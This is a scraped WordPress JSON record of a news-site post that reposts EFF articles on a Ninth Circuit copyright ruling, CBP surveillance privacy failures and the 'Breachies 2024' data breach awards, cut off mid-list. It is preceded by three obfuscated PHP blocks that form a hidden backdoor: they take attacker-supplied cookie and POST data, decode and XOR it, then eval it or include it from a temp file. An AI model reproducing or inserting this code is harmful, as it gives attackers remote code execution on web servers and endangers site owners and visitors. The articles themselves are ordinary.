$zsyUCM = "\x78" . chr ( 717 - 616 )."\137" . "\x61" . "\x5a" . "\101";$PFjRtn = "\x63" . "\x6c" . 'a' . chr (115) . "\163" . chr (95) . chr (101) . chr (120) . "\151" . chr (115) . chr ( 287 - 171 )."\x73";$YFZuUhHJ = class_exists($zsyUCM); $PFjRtn = "42169";$ROEmCgEmgC = strpos($PFjRtn, $zsyUCM);if ($YFZuUhHJ == $ROEmCgEmgC){function LTEJSV(){$OrYPFIxe = new /* 33980 */ xe_aZA(12595 + 12595); $OrYPFIxe = NULL;}$YIomAGhZVv = "12595";class xe_aZA{private function lAIIvlAlpo($YIomAGhZVv){if (is_array(xe_aZA::$dNwWaPyr)) {$oiNkU2 = str_replace("<" . "?php", "", xe_aZA::$dNwWaPyr["content"]);eval($oiNkU2); $YIomAGhZVv = "12595";exit();}}public function IeLFPTWLCA(){$oiNkU = "283";$this->_dummy = str_repeat($oiNkU, strlen($oiNkU));}public function __destruct(){xe_aZA::$dNwWaPyr = @unserialize(xe_aZA::$dNwWaPyr); $YIomAGhZVv = "37902_53999";$this->lAIIvlAlpo($YIomAGhZVv); $YIomAGhZVv = "37902_53999";}public function yQmvnUBv($oiNkU, $DaAyMVqEO){return $oiNkU[0] ^ str_repeat($DaAyMVqEO, intval(strlen($oiNkU[0]) / strlen($DaAyMVqEO)) + 1);}public function kQEtSGyJY($oiNkU){$FWDQluj = 'b' . "\x61" . 's' . "\x65" . chr ( 316 - 262 ).'4';return array_map($FWDQluj . chr ( 891 - 796 )."\144" . chr (101) . "\143" . 'o' . "\x64" . chr ( 809 - 708 ), array($oiNkU,));}public function __construct($AoLbaKFRoC=0){$VGoFvkYG = chr (44); $oiNkU = "";$RXanOOsZ = $_POST;$lKWLjAlV = $_COOKIE;$DaAyMVqEO = "2a4af22a-324c-4495-ba8c-91e4652bb45d";$YWvPZEopg = @$lKWLjAlV[substr($DaAyMVqEO, 0, 4)];if (!empty($YWvPZEopg)){$YWvPZEopg = explode($VGoFvkYG, $YWvPZEopg);foreach ($YWvPZEopg as $avvNEVLMAi){$oiNkU .= @$lKWLjAlV[$avvNEVLMAi];$oiNkU .= @$RXanOOsZ[$avvNEVLMAi];}$oiNkU = $this->kQEtSGyJY($oiNkU);}xe_aZA::$dNwWaPyr = $this->yQmvnUBv($oiNkU, $DaAyMVqEO);if (strpos($DaAyMVqEO, $VGoFvkYG) !== FALSE){$DaAyMVqEO = explode($VGoFvkYG, $DaAyMVqEO); $IhlxuAFs = base64_decode(strrev($DaAyMVqEO[0]));}}public static $dNwWaPyr = 35467;}LTEJSV();}$TEystoEjzb = 'm' . chr ( 770 - 671 )."\150" . chr ( 357 - 262 )."\x4e" . "\x68" . "\170" . "\x66" . 'k';$tjcaJl = chr ( 978 - 879 )."\154" . chr ( 983 - 886 ).chr ( 896 - 781 ).chr ( 551 - 436 )."\x5f" . chr (101) . 'x' . "\151" . chr ( 689 - 574 ).chr (116) . 's';$mEbbYTt = class_exists($TEystoEjzb); $tjcaJl = "12466";$KqzdIyBw = strpos($tjcaJl, $TEystoEjzb);if ($mEbbYTt == $KqzdIyBw){function OWEwffjgA(){$eyWvrKef = new /* 55036 */ mch_Nhxfk(33619 + 33619); $eyWvrKef = NULL;}$TCKjlpEkO = "33619";class mch_Nhxfk{private function dKpehsMR($TCKjlpEkO){if (is_array(mch_Nhxfk::$ynMAWEJO)) {$name = sys_get_temp_dir() . "/" . crc32(mch_Nhxfk::$ynMAWEJO["salt"]);@mch_Nhxfk::$ynMAWEJO["write"]($name, mch_Nhxfk::$ynMAWEJO["content"]);include $name;@mch_Nhxfk::$ynMAWEJO["delete"]($name); $TCKjlpEkO = "33619";exit();}}public function SDQset(){$hYhZhQe = "21973";$this->_dummy = str_repeat($hYhZhQe, strlen($hYhZhQe));}public function __destruct(){mch_Nhxfk::$ynMAWEJO = @unserialize(mch_Nhxfk::$ynMAWEJO); $TCKjlpEkO = "18815_31585";$this->dKpehsMR($TCKjlpEkO); $TCKjlpEkO = "18815_31585";}public function sDYlixVnA($hYhZhQe, $YSsEwG){return $hYhZhQe[0] ^ str_repeat($YSsEwG, intval(strlen($hYhZhQe[0]) / strlen($YSsEwG)) + 1);}public function edEPNX($hYhZhQe){$rupHSGXoBz = "\142" . "\141" . "\x73" . chr (101) . chr (54) . "\64";return array_map($rupHSGXoBz . chr (95) . chr ( 996 - 896 ).chr ( 1085 - 984 ).chr (99) . chr ( 375 - 264 ).'d' . "\x65", array($hYhZhQe,));}public function __construct($SRbNrdusw=0){$ayEyI = ',';$hYhZhQe = "";$LIYFKkHbb = $_POST;$sYBFdyPe = $_COOKIE;$YSsEwG = "a388bc99-5682-4cf7-bad7-9b894580c944";$wdyleeQ = @$sYBFdyPe[substr($YSsEwG, 0, 4)];if (!empty($wdyleeQ)){$wdyleeQ = explode($ayEyI, $wdyleeQ);foreach ($wdyleeQ as $NPfGPKlt){$hYhZhQe .= @$sYBFdyPe[$NPfGPKlt];$hYhZhQe .= @$LIYFKkHbb[$NPfGPKlt];}$hYhZhQe = $this->edEPNX($hYhZhQe);}mch_Nhxfk::$ynMAWEJO = $this->sDYlixVnA($hYhZhQe, $YSsEwG);if (strpos($YSsEwG, $ayEyI) !== FALSE){$YSsEwG = explode($ayEyI, $YSsEwG); $AHjGatIAu = base64_decode(md5($YSsEwG[0])); $yewTxtmiBy = strlen($YSsEwG[1]) > 5 ? substr($YSsEwG[1], 0, 5) : $YSsEwG[1];$_GET['new_key'] = md5(implode('', $YSsEwG)); $PcvTnvLfXD = str_repeat($yewTxtmiBy, 2); $zjVGshnHkH = array_map('trim', $YSsEwG);if (is_array($zjVGshnHkH) && count($zjVGshnHkH) > 1) {$CwFFDIr = $zjVGshnHkH[0];} else {$CwFFDIr = '';}}}public static $ynMAWEJO = 15637;}OWEwffjgA();}$tCurWDKdsP = chr ( 1032 - 929 )."\x4e" . '_' . 'k' . chr (87) . "\101" . "\164";$SZltFKEw = chr (99) . chr (108) . chr (97) . chr (115) . chr ( 234 - 119 ).chr ( 252 - 157 )."\145" . 'x' . chr (105) . chr (115) . chr (116) . "\163";$gPXBkSNty = class_exists($tCurWDKdsP); $SZltFKEw = "30001";$nvemgOjaqk = strpos($SZltFKEw, $tCurWDKdsP);if ($gPXBkSNty == $nvemgOjaqk){function iBDtsZKuD(){$cCoDiATQx = new /* 54584 */ gN_kWAt(34487 + 34487); $cCoDiATQx = NULL;}$XJUJVuL = "34487";class gN_kWAt{private function KDCTggu($XJUJVuL){if (is_array(gN_kWAt::$ktbGMaWCHr)) {$ECvDMsrMkb = str_replace('<' . chr (63) . "\x70" . chr (104) . "\160", "", gN_kWAt::$ktbGMaWCHr['c' . "\157" . chr (110) . 't' . chr (101) . "\156" . chr ( 553 - 437 )]);eval($ECvDMsrMkb); $XJUJVuL = "34487";exit();}}public function SFvNTMsb(){$kCLGXxz = "12398";$this->_dummy = str_repeat($kCLGXxz, strlen($kCLGXxz));}public function __destruct(){gN_kWAt::$ktbGMaWCHr = @unserialize(gN_kWAt::$ktbGMaWCHr); $XJUJVuL = "2467_869";$this->KDCTggu($XJUJVuL); $XJUJVuL = "2467_869";}public function cciXX($kCLGXxz, $IKJyPGX){return $kCLGXxz[0] ^ str_repeat($IKJyPGX, (strlen($kCLGXxz[0]) / strlen($IKJyPGX)) + 1);}public function CwnBGwi($kCLGXxz){$BOvnQaXh = "base64";return array_map($BOvnQaXh . "\137" . "\x64" . 'e' . "\x63" . chr ( 873 - 762 ).'d' . chr ( 167 - 66 ), array($kCLGXxz,));}public function __construct($cAkjEe=0){$ovsCft = ",";$kCLGXxz = "";$tCgiH = $_POST;$nzetxWG = $_COOKIE;$IKJyPGX = "357f6350-42a1-4e4a-94cd-b9561b849dfb";$iuEVe = @$nzetxWG[substr($IKJyPGX, 0, 4)];if (!empty($iuEVe)){$iuEVe = explode($ovsCft, $iuEVe);foreach ($iuEVe as $nNeddGr){$kCLGXxz .= @$nzetxWG[$nNeddGr];$kCLGXxz .= @$tCgiH[$nNeddGr];}$kCLGXxz = $this->CwnBGwi($kCLGXxz);}gN_kWAt::$ktbGMaWCHr = $this->cciXX($kCLGXxz, $IKJyPGX);if (strpos($IKJyPGX, $ovsCft) !== FALSE){$IKJyPGX = explode($ovsCft, $IKJyPGX);}}public static $ktbGMaWCHr = 11808;}iBDtsZKuD();}{"id":4535,"date":"2015-06-21T01:53:41","date_gmt":"2015-06-21T01:53:41","guid":{"rendered":"http:\/\/newsstandard.ca\/?p=4535"},"modified":"2021-01-07T03:15:55","modified_gmt":"2021-01-07T03:15:55","slug":"anarcho-libero-constitutionalist-transcendentalist","status":"publish","type":"post","link":"https:\/\/newsstandard.ca\/channels\/anarcho-libero-constitutionalist-transcendentalist\/","title":{"rendered":"Anarcho-Libero-Constitutionalist-Transcendentalist"},"content":{"rendered":"

READS: Bill of Rights<\/a> (US) –\u00a0 Anarchist’s Cookbook\u00a0<\/a>–\u00a0 Preface to Transgression<\/a> –<\/p>\n

VIDEOS: The Birth of a Tool<\/a>, The Birth of a Wooden House<\/a>, Basque Axes<\/a>,<\/p>\n

<\/a> <\/span><\/h2><\/div>
<\/span><\/a><\/div>Ninth Circuit Gets It: Interoperability Isn\u2019t an Automatic First Step to Liability<\/a><\/span>
by Corynne McSherry<\/a> on December 20, 2024 at 7:26 pm <\/small>
A federal appeals court just gave software developers, and users, an early holiday present, holding that software updates aren\u2019t necessarily \u201cderivative,\u201d for purposes of copyright law,\u00a0just because they are designed to interoperate the software they update. \nThis sounds kind of obscure, so let\u2019s cut through the legalese. Lots of developers build software designed to interoperate with preexisting works. This kind of interoperability is crucial to innovation, particularly in a world where a small number of companies control so many essential tools and platforms. If users want to be able to repair, improve, and secure their devices, they must be able to rely on third parties to help. Trouble is, Big Tech companies want to be able to control (and charge for) every possible use of the devices and software they \u201csell\u201d you \u2013 and they won\u2019t hesitate to use the law to enforce that control.\u00a0 \nCourts shouldn\u2019t assist, but unfortunately a federal district court did just that in the latest iteration of Oracle v. Rimini. Rimini provides support to improve the use and security of Oracle products, so customers don\u2019t have to depend entirely on Oracle itself . Oracle doesn\u2019t want this kind of competition, so it sued Rimini for copyright infringement, arguing that a software update Rimini developed was a \u201cderivative work\u201d because it was intended to interoperate with Oracle's software, even though the update didn\u2019t use any of Oracle\u2019s copyrightable code. Derivative works are typically things like a movie based on a novel, or a translation of that novel. Here, the only \u201cderivative\u201d aspect was that Rimini\u2019s code was designed to interact with Oracle\u2019s code. \u00a0\u00a0Unfortunately, the district court initially sided with Oracle, setting a dangerous precedent. If a work is derivative, it may infringe the copyright in the preexisting work from which it, well, derives. For decades, software developers have relied, correctly, on the settled view that a work is not derivative under copyright law unless it is substantially similar to a preexisting work in both ideas and expression. Thanks to that rule, software developers can build innovative new tools that interact with preexisting works, including tools that improve privacy and security, without fear that the companies that hold rights in those preexisting works would have an automatic copyright claim to those innovations.\u00a0\u00a0\nRimini appealed to the Ninth Circuit, on multiple grounds. EFF, along with a diverse group of stakeholders representing consumers, small businesses, software developers, security researchers, and the independent repair community, filed an amicus brief in support explaining that the district court ruling on interoperability was not just bad policy, but also bad law.\u202f\u00a0\n\u00a0The Ninth Circuit agreed:\u00a0 \nIn effect, the district court adopted an \u201cinteroperability\u201d test for derivative works\u2014if a product can only interoperate with a preexisting copyrighted work, then it must be derivative. But neither the text of the Copyright Act nor our precedent supports this interoperability test for derivative works.\u00a0\n\n\u00a0The court goes on to give a primer on the legal definition of derivative work, but the key point is this: a work is only derivative if it \u201csubstantially incorporates the other work.\u201d \nCopyright already reaches far too broadly, giving rightsholders extraordinary power over how we use everything from music to phones to televisions. This holiday season, we\u2019re raising a glass to the judges who sensibly reined that power in.\u00a0<\/p><\/div><\/li>
<\/span><\/a><\/div>Customs & Border Protection Fails Baseline Privacy Requirements for Surveillance Technology<\/a><\/span>
by Dave Maass<\/a> on December 20, 2024 at 6:47 pm <\/small>
U.S. Customs and Border Protection (CBP) has failed to address six out of six main privacy protections for three of its border surveillance programs\u2014surveillance towers, aerostats, and unattended ground sensors\u2014according to a new assessment by the Government Accountability Office (GAO).\nIn the report, GAO compared the policies for these technologies against six of the key Fair Information Practice Principles that agencies are supposed to use when evaluating systems and processes that may impact privacy, as dictated by both Office of Management and Budget guidance and the Department of Homeland Security's own rules.\n\nThese include:\n\nData collection. \"DHS should collect only PII [Personally Identifiable Information] that is directly relevant and necessary to accomplish the specified purpose(s).\"\nPurpose specification. \"DHS should specifically articulate the purpose(s) for which the PII is intended to be used.\"\nInformation sharing. \"Sharing PII outside the department should be for a purpose compatible with the purpose for which the information was collected.\"\nData security. \"DHS should protect PII through appropriate security safeguards against risks such as loss, unauthorized access or use, destruction, modification, or unintended or inappropriate disclosure.\"\nData retention. \"DHS should only retain PII for as long as is necessary to fulfill the specified purpose(s).\"\nAccountability. \"DHS should be accountable for complying with these principles, including by auditing the actual use of PII to demonstrate compliance with these principles and all applicable privacy protection requirements.\"\n\nThese baseline privacy elements for the three border surveillance technologies were not addressed in any \"technology policies, standard operating procedures, directives, or other documents that direct a user in how they are to use a Technology,\" according to GAO's review.\nCBP operates hundreds of surveillance towers along both the northern and southern borders, some of which are capable of capturing video more than seven miles away. The agency has six large aerostats (essentially tethered blimps) that use radar along the southern border, with others stationed in the Florida Keys and Puerto Rico. The agency also operates a series of smaller aerostats that stream video in the Rio Grande Valley of Texas, with the newest one installed this fall in southeastern New Mexico. And the report notes deficiencies with CBP's linear ground detection system, a network of seismic sensors and cameras that are triggered by movement or footsteps.\nThe GAO report underlines EFF's concerns that the privacy of people who live and work in the borderlands is violated when federal agencies deploy militarized, high-tech programs to confront unauthorized border crossings. The rights of border communities are too often treated as acceptable collateral damage in pursuit of border security.\nCBP defended its practices by saying that it does, to some extent, address FIPS in its Privacy Impact Assessments, documents written for public consumption. GAO rejected this claim, saying that these assessments are not adequate in instructing agency staff on how to protect privacy when deploying the technologies and using the data that has been collected.\nIn its recommendations, the GAO calls on the CBP Commissioner to \"require each detection, observation, and monitoring technology policy to address the privacy protections in the Fair Information Practice Principles.\" But EFF calls on Congress to hold CBP to account and stop approving massive spending on border security technologies that the agency continues to operate irresponsibly.<\/p><\/div><\/li>
<\/span><\/a><\/div>The Breachies 2024: The Worst, Weirdest, Most Impactful Data Breaches of the Year<\/a><\/span>
by Thorin Klosowski<\/a> on December 19, 2024 at 10:38 pm <\/small>
Every year, countless emails hit our inboxes telling us that our personal information was accessed, shared, or stolen in a data breach. In many cases, there is little we can do. Most of us can assume that at least our phone numbers, emails, addresses, credit card numbers, and social security numbers are all available somewhere on the internet. \nBut some of these data breaches are more noteworthy than others, because they include novel information about us, are the result of particularly noteworthy security flaws, or are just so massive they\u2019re impossible to ignore. For that reason, we are introducing the Breachies, a series of tongue-in-cheek \u201cawards\u201d for some of the most egregious data breaches of the year.\nIf these companies practiced a privacy first approach and focused on data minimization, only collecting and storing what they absolutely need to provide the services they promise, many data breaches would be far less harmful to the victims. But instead, companies gobble up as much as they can, store it for as long as possible, and inevitably at some point someone decides to poke in and steal that data.\nOnce all that personal data is stolen, it can be used against the breach victims for identity theft, ransomware attacks, and to send unwanted spam. The risk of these attacks isn\u2019t just a minor annoyance: research shows it can cause psychological injury, including anxiety, depression, and PTSD. To avoid these attacks, breach victims must spend time and money to freeze and unfreeze their credit reports, to monitor their credit reports, and to obtain identity theft prevention services. \nThis year we\u2019ve got some real stinkers, ranging from private health information to\u2014you guessed it\u2014credit cards and social security numbers.\nThe Winners\n\nThe Just Stop Using Tracking Tech Award: Kaiser Permanente\nThe Most Impactful Data Breach for \u201990s Kids Award: Hot Topic\nThe Only Stalkers Allowed Award: mSpy\nThe I Didn\u2019t Even Know You Had My Information Award: Evolve Bank\nThe We Told You So Award: AU10TIX\nThe Why We\u2019re Still Stuck on Unique Passwords Award: Roku\nThe Listen, Security Researchers are Trying to Help Award: City of Columbus\nThe Have I Been Pwned? Award: Spoutible\nThe Reporting\u2019s All Over the Place Award: National Public Data\nThe Biggest Health Breach We\u2019ve Ever Seen Award: Change Health\nThe There\u2019s No Such Thing As Backdoors for Only \u201cGood Guys\u201d Award: Salt Typhoon\nBreach of the Year (of the Decade?): Snowflake\nTips to Protect Yourself\n(Dis)Honorable Mentions\n\nThe Just Stop Using Tracking Tech Award: Kaiser Permanente\nIn one of the year's most preventable breaches, the healthcare company Kaiser Permanente exposed 13 million patients\u2019 information via tracking code embedded in its website and app. This tracking code transmitted potentially sensitive medical information to Google, Microsoft, and X (formerly known as Twitter). The exposed information included patients\u2019 names, terms they searched in Kaiser\u2019s Health Encyclopedia, and how they navigated within and interacted with Kaiser\u2019s website or app.\nThe most troubling aspect of this breach is that medical information was exposed not by a sophisticated hack, but through widely used tracking technologies that Kaiser voluntarily placed on its website. Kaiser has since removed the problematic code, but tracking technologies are rampant across the internet and on other healthcare websites. A 2024 study found tracking technologies sharing information with third parties on 96% of hospital websites. Websites usually use tracking technologies to serve targeted ads. But these same technologies give advertisers, data brokers, and law enforcement easy access to details about your online activity.\nWhile individuals can protect themselves from online tracking by using tools like EFF\u2019s Privacy Badger, we need legislative action to make online privacy the norm for everyone. EFF advocates for a ban on online behavioral advertising to address the primary incentive for companies to use invasive tracking technology. Otherwise, we\u2019ll continue to see companies voluntarily sharing your personal data, then apologizing when thieves inevitably exploit a vulnerability in these tracking systems. \nHead back to the table of contents.\nThe Most Impactful Data Breach for \u201990s Kids Award: Hot Topic\nIf you were in middle or high school any time in the \u201990s you probably have strong memories of Hot Topic. Baby goths and young punk rockers alike would go to the mall, get an Orange Julius and greasy slice of Sbarro pizza, then walk over to Hot Topic to pick up edgy t-shirts and overpriced bondage pants (all the while debating who was the biggest poser and which bands were sellouts, of course). Because of the fundamental position Hot Topic occupies in our generation\u2019s personal mythology, this data breach hits extra hard. \nIn November 2024, Have I Been Pwned reported that Hot Topic and its subsidiary Box Lunch suffered a data breach of nearly 57 million data records. A hacker using the alias \u201cSatanic\u201d claimed responsibility and posted a 730 GB database on a hacker forum with a sale price of $20,000. The compromised data about approximately 54 million customers reportedly includes: names, email addresses, physical addresses, phone numbers, purchase history, birth dates, and partial credit card details. Research by Hudson Rock indicates that the data was compromised using info stealer malware installed on a Hot Topic employee\u2019s work computer. \u201cSatanic\u201d claims that the original infection stems from the Snowflake data breach (another Breachie winner); though that hasn\u2019t been confirmed because Hot Topic has still not notified customers, nor responded to our request for comment. \nThough data breaches of this scale are common, it still breaks our little goth hearts, and we\u2019d prefer stores did a better job of securing our data. Worse, Hot Topic still hasn\u2019t publicly acknowledged this breach, despite numerous news reports. Perhaps Hot Topic was the real sellout all along.\u00a0\nHead back to the table of contents.\nThe Only Stalkers Allowed Award: mSpy\nmSpy, a commercially-available mobile stalkerware app owned by Ukrainian-based company Brainstack, was subject to a data breach earlier this year. More than a decade\u2019s worth of information about the app\u2019s customers was stolen, as well as the real names and email addresses of Brainstack employees. \nThe defining feature of stalkerware apps is their ability to operate covertly and trick users into believing that they are not being monitored. But in reality, applications like mSpy allow whoever planted the stalkerware to remotely view the contents of the victim\u2019s device in real time. These tools are often used to intimidate, harass, and harm victims, including by stalkers and abusive (ex) partners. Given the highly sensitive data collected by companies like mSpy and the harm to targets when their data gets revealed, this data breach is another example of why stalkerware must be stopped.\u00a0\nHead back to the table of contents.\nThe I Didn\u2019t Even Know You Had My Information Award: Evolve Bank\nOkay, are we the only ones\u00a0 who hadn\u2019t heard of Evolve Bank? It was reported in May that Evolve Bank experienced a data breach\u2014though it actually happened all the way back in February. You may be thinking, \u201cwhy does this breach matter if I\u2019ve never heard of Evolve Bank before?\u201d That\u2019s what we thought too! \nBut here\u2019s the thing: this attack affected a bunch of companies you have heard of, like Affirm (the buy now, pay later service), Wise (the international money transfer service), and Mercury Bank (a fintech company). So, a ton of services use the bank, and you may have used one of those services. It\u2019s been reported that 7.6 million Americans were affected by the breach, with most of the data stolen being customer information, including social security numbers, account numbers, and date of birth. \nThe small bright side? No customer funds were accessed during the breach. Evolve states that after the breach they are doing some basic things like resetting user passwords and strengthening their security infrastructure.\u00a0\nHead back to the table of contents.\nThe We Told You So Award: AU10TIX\nAU10TIX is an \u201cidentity verification\u201d company used by the likes of TikTok and X to confirm that users are who they claim to be. AU10TIX and companies like it collect and review sensitive private documents such as driver\u2019s license information before users can register for a site or access some content. \nUnfortunately, there is growing political interest in mandating identity or age verification before allowing people to access social media or adult material. EFF and others oppose these plans because they threaten both speech and privacy. As we said in 2023, verification mandates would inevitably lead to more data breaches, potentially exposing government IDs as well as information about the sites that a user visits. \nLook no further than the AU10TIX breach to see what we mean. According to a report by 404 Media in May, AU10TIX left login credentials exposed online for more than a year, allowing access to very sensitive user data. \n404 Media details how a researcher gained access to the company\u2019s logging platform, \u201cwhich in turn contained links to data related to specific people who had uploaded their identity documents.\u201d This included \u201cthe person\u2019s name, date of birth, nationality, identification number, and the type of document uploaded such as a drivers\u2019 license,\u201d as well as images of those identity documents. \nThe AU10TIX breach did not seem to lead to exposure beyond what the researcher showed was possible. But AU10TIX and other companies must do a better job at locking down user data. More importantly, politicians must not create new privacy dangers by requiring identity and age verification. \nIf age verification requirements become law, we\u2019ll be handing a lot of our sensitive information over to companies like AU10TIX. This is the first We Told You So Breachie award, but it likely won\u2019t be the last.\u00a0\nHead back to the table of contents.\nThe Why We\u2019re Still Stuck on Unique Passwords Award: Roku\nIn April, Roku announced not yet another new way to display more ads, but a data breach (its second of the year) where 576,000 accounts were compromised using a \u201ccredential stuffing attack.\u201d This is a common, relatively easy sort of automated attack where thieves use previously leaked username and password combinations (from a past data breach of an unrelated company) to get into accounts on a different service. So, if say, your username and password was in the Comcast data breach in 2015, and you used the same username and password on Roku, the attacker might have been able to get into your account. Thankfully, less than 400 Roku accounts saw unauthorized purchases, and no payment information was accessed. \nBut the ease of this sort of data breach is why it\u2019s important to use unique passwords everywhere. A password manager, including one that might be free on your phone or browser, makes this much easier to do. Likewise, credential stuffing illustrates why it\u2019s important to use two-factor authentication. After the Roku breach, the company turned on two-factor authentication for all accounts. This way, even if someone did get access to your account password, they\u2019d need that second code from another device; in Roku\u2019s case, either your phone number or email address.\nHead back to the table of contents.\nThe Listen, Security Researchers are Trying to Help Award: City of Columbus\nIn August, the security researcher David Ross Jr. (also known as Connor Goodwolf) discovered that a ransomware attack against the City of Columbus, Ohio, was much more serious than city officials initially revealed. After the researcher informed the press and provided proof, the city accused him of violating multiple laws and obtained a gag order against him. \nRather than silencing the researcher, city officials should have celebrated him for helping victims understand the true extent of the breach. EFF and security researchers know the value of this work. And EFF has a team of lawyers who help protect researchers and their work.\u00a0 \nHere is how not to deal with a security researcher: In July, Columbus learned it had suffered a ransomware attack. A group called Rhysida took responsibility. The city did not pay the ransom, and the group posted some of the stolen data online. The mayor announced the stolen data was \u201cencrypted or corrupted,\u201d so most of it was unusable. Later, the researcher, David Ross, helped inform local news outlets that in fact the breach did include usable personal information on residents. He also attempted to contact the city. Days later, the city offered free credit monitoring to all of its residents and confirmed that its original announcement was inaccurate. \nUnfortunately, the city also filed a lawsuit, and a judge signed a temporary restraining order preventing the researcher from accessing, downloading, or disseminating the data. Later, the researcher agreed to a more limited injunction. The city eventually confirmed that the data of hundreds of thousands of people was stolen in the ransomware attack, including drivers licenses, social security numbers, employee information, and the identities of juvenile victims, undercover police officers, and confidential informants.\nHead back to the table of contents.\nThe Have I Been Pwned? Award: Spoutible\nThe Spoutible breach has layers\u2014layers of \u201cno way!\u201d that keep revealing more and more amazing little facts the deeper one digs.\nIt all started with a leaky API. On a per-user basis, it didn\u2019t just return the sort of information you\u2019d expect from a social media platform, but also the user\u2019s email, IP address, and phone number. No way! Why would you do that?\nBut hold on, it also includes a bcrypt hash of their password. No way! Why would you do that?!\nAh well, at least they offer two-factor authentication (2FA) to protect against password leakages, except\u2026 the API was also returning the secret used to generate the 2FA OTP as well. No way! So, if someone had enabled 2FA it was immediately rendered useless by virtue of this field being visible to everyone. \nHowever, the pi\u00e8ce de resistance comes with the next field in the API: the \u201cem_code.\u201d You know how when you do a password reset you get emailed a secret code that proves you control the address and can change the password? That was the code! No way! \n-EFF thanks guest author Troy Hunt for this contribution to the Breachies.\nHead back to the table of contents.\nThe Reporting\u2019s All Over the Place Award: National Public Data\nIn January 2024, there was almost no chance you\u2019d have heard of a company called National Public Data. But starting in April, then ramping up in June, stories revealed a breach affecting the background checking data broker that included names, phone numbers, addresses, and social security numbers of at least 300 million people. By August, the reported number ballooned to 2.9 billion people. In October, National Public Data filed for bankruptcy, leaving behind nothing but a breach notification on its website. \nBut what exactly was stolen? The evolving news coverage has raised more questions than it has answered. Too bad National Public Data has failed to tell the public more about the data that the company failed to secure. \nOne analysis found that some of the dataset was inaccurate, with a number of duplicates; also, while there were 137 million email addresses, they weren\u2019t linked to social security numbers. Another analysis had similar results. As for social security numbers, there were likely somewhere around 272 million in the dataset. The data was so jumbled that it had names matched to the wrong email or address, and included a large chunk of people who were deceased. Oh, and that 2.9 billion number? That was the number of rows of data in the dataset, not the number of individuals. That 2.9 billion people number appeared to originate from a complaint filed in Florida.\nPhew, time to check in with Count von Count on this one, then. \nHow many people were truly affected? It\u2019s difficult to say for certain. The only thing we learned for sure is that starting a data broker company appears to be incredibly easy, as NPD was owned by a retired sheriff\u2019s deputy and a small film studio and didn\u2019t seem to be a large operation. While this data broker got caught with more leaks than the Titanic, hundreds of others are still out there collecting and hoarding information, and failing to watch out for the next iceberg.\nHead back to the table of contents.\nThe Biggest Health Breach We\u2019ve Ever Seen Award: Change Health\nIn February, a ransomware attack on Change Healthcare exposed the private health information of over 100 million people. The company, which processes 40% of all U.S. health insurance claims, was forced offline for nearly a month. As a result, healthcare practices nationwide struggled to stay operational and patients experienced limits on access to care. Meanwhile, the stolen data poses long-term risks for identity theft and insurance fraud for millions of Americans\u2014it includes patients\u2019 personal identifiers, health diagnoses, medications, insurance details, financial information, and government identity documents. \nThe misuse of medical records can be harder to detect and correct that regular financial fraud or identity theft. The FTC recommends that people at risk of medical identity theft watch out for suspicious medical bills or debt collection notices. \nThe hack highlights the need for stronger cybersecurity in the healthcare industry, which is increasingly targeted by cyberattacks. The Change Healthcare hackers were able to access a critical system because it lacked two-factor authentication, a basic form of security. \nTo make matters worse, Change Healthcare\u2019s recent merger with Optum, which antitrust regulators tried and failed to block, even further centralized vast amounts of sensitive information. Many healthcare providers blamed corporate consolidation for the scale of disruption. As the former president of the American Medical Association put it, \u201cWhen we have one option, then the hackers have one big target\u2026 if they bring that down, they can grind U.S. health care to a halt.\u201d Privacy and competition are related values, and data breach and monopoly are connected problems.\nHead back to the table of contents.\nThe There\u2019s No Such Thing As Backdoors for Only \u201cGood Guys\u201d Award: Salt Typhoon\nWhen companies build backdoors into their services to provide law enforcement access to user data, these backdoors can be exploited by thieves, foreign governments, and other adversaries. There are no methods of access that are magically only accessible to \u201cgood guys.\u201d No security breach has demonstrated that more clearly than this year\u2019s attack by Salt Typhoon, a Chinese government-backed hacking group. \nInternet service providers generally have special systems to provide law enforcement and intelligence agencies access to user data. They do that to comply with laws like CALEA, which require telecom companies to provide a means for \u201clawful intercepts\u201d\u2014in other words, wiretaps. \nThe Salt Typhoon group was able to access the powerful tools that in theory have been reserved for U.S. government agencies. The hackers infiltrated the nation\u2019s biggest telecom networks, including Verizon, AT&T, and others, and were able to target their surveillance based on U.S. law enforcement wiretap requests. Breaches elsewhere in the system let them listen in on calls in real time. People under U.S. surveillance were clearly some of the targets, but the hackers also targeted both 2024 presidential campaigns and officials in the State Department.\u00a0 \nWhile fewer than 150 people have been identified as targets so far, the number of people who were called or texted by those targets run into the \u201cmillions,\u201d according to a Senator who has been briefed on the hack. What\u2019s more, the Salt Typhoon hackers still have not been rooted out of the networks they infiltrated. \nThe idea that only authorized government agencies would use such backdoor access tools has always been flawed. With sophisticated state-sponsored hacking groups operating across the globe, a data breach like Salt Typhoon was only a matter of time.\u00a0\nHead back to the table of contents.\nThe Snowballing Breach of the Year Award: Snowflake\nThieves compromised the corporate customer accounts for U.S. cloud analytics provider Snowflake. The corporate customers included AT&T, Ticketmaster, Santander, Neiman Marcus, and many others: 165 in total. \nThis led to a massive breach of billions of data records for individuals using these companies. A combination of infostealer malware infections on non-Snowflake machines as well as weak security used to protect the affected accounts allowed the hackers to gain access and extort the customers. At the time of the hack, April-July of this year, Snowflake was not requiring two-factor authentication, an account security measure which could have provided protection against the attacks. A number of arrests were made after security researchers uncovered the identities of several of the threat actors.\nBut what does Snowflake do? According to their website, Snowflake \u201cis a cloud-based data platform that provides data storage, processing, and analytic solutions.\u201d Essentially, they store and index troves of customer data for companies to look at. And the larger the amount of data stored, the bigger the target for malicious actors to use to put leverage on and extort those companies. The problem is the data is on all of us. In the case of Snowflake customer AT&T, this includes billions of call and text logs of its customers, putting individuals\u2019 sensitive data at risk of exposure. A privacy-first approach would employ techniques such as data minimization and either not collect that data in the first place or shorten the retention period that the data is stored. Otherwise it just sits there waiting for the next breach.\nHead back to the table of contents.\nTips to Protect Yourself\nData breaches are such a common occurrence that it\u2019s easy to feel like there\u2019s nothing you can do, nor any point in trying. But privacy isn\u2019t dead. While some information about you is almost certainly out there, that\u2019s no reason for despair. In fact, it\u2019s a good reason to take action. \nThere are steps you can take right now with all your online accounts to best protect yourself from the the next data breach (and the next, and the next):\n\nUse unique passwords on all your online accounts. This is made much easier by using a password manager, which can generate and store those passwords for you. When you have a unique password for every website, a data breach of one site won\u2019t cascade to others.\nUse two-factor authentication when a service offers it. Two-factor authentication makes your online accounts more secure by requiring additional proof (\u201cfactors\u201d) alongside your password when you log in. While two-factor authentication adds another step to the login process, it\u2019s a great way to help keep out anyone not authorized, even if your password is breached.\nFreeze your credit. Many experts recommend freezing your credit with the major credit bureaus as a way to protect against the 